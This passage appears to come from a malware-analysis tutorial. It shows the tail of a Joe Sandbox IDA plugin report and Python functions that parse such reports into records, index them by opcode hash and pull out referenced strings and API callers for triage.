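Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileString
• String ID: A4@$Server Details
• API String ID: 1096422788-4071850762
• Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
"""


def parse_records(text: str) -> List[dict]:
    """One dict per function record; a new record begins at each 'APIs' header."""
    records: List[dict] = []
    rec: dict = {}
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "subcalls": [], "strings": [], "source": {}, "snapshot": "", "similarity": {}}
                records.append(rec)
            section = line
        elif rec and line.startswith("•"):
            item = line[1:].strip()
            if section == "APIs":
                sub = SUBCALL_RE.match(item)
                call = API_RE.match(sub.group("rest") if sub else item)
                if call and sub:
                    rec["subcalls"].append({"caller": sub.group("func"), **call.groupdict()})
                elif call:
                    rec["apis"].append(call.groupdict())
            elif section == "Strings":
                m = STRING_RE.match(item)
                if m:
                    rec["strings"].append(m.groupdict())
            elif section == "Memory Dump Source":
                for part in item.split(", "):  # "Source File: ..., Offset: ..., based on PE: ..."
                    key, _, val = part.partition(": ")
                    rec["source"][key] = val
            elif section == "Joe Sandbox IDA Plugin":
                key, _, val = item.partition(": ")
                if key == "Snapshot File":
                    rec["snapshot"] = val
            elif section == "Similarity":
                key, _, val = item.partition(":")  # value may be empty, e.g. "String ID:"
                rec["similarity"][key.strip()] = val.strip()
    return records


def index_by_opcode(records: List[dict]) -> Dict[str, dict]:
    """Key records by Opcode ID, the hash the report uses to match functions across snapshots."""
    return {r["similarity"]["Opcode ID"]: r for r in records if r["similarity"].get("Opcode ID")}


def strings_of(record: dict) -> List[str]:
    """Strings a function references; the report joins them with '$' in the String ID field."""
    return [s for s in record["similarity"].get("String ID", "").split("$") if s]


def calling(records: List[dict], api: str) -> List[dict]:
    """Records whose direct APIs (not subcalls) include the named import."""
    return [r for r in records if any(a["name"] == api for a in r["apis"])]
```

Feeding the whole listing through `parse_records` and then `index_by_opcode` gives a table that can be joined against the same export from another dump or sample; `calling(recs, "GetPrivateProfileStringA")` and `strings_of` pull out the functions and strings (here "Server Details" and "sqlite3.dll") that are worth a closer look during triage.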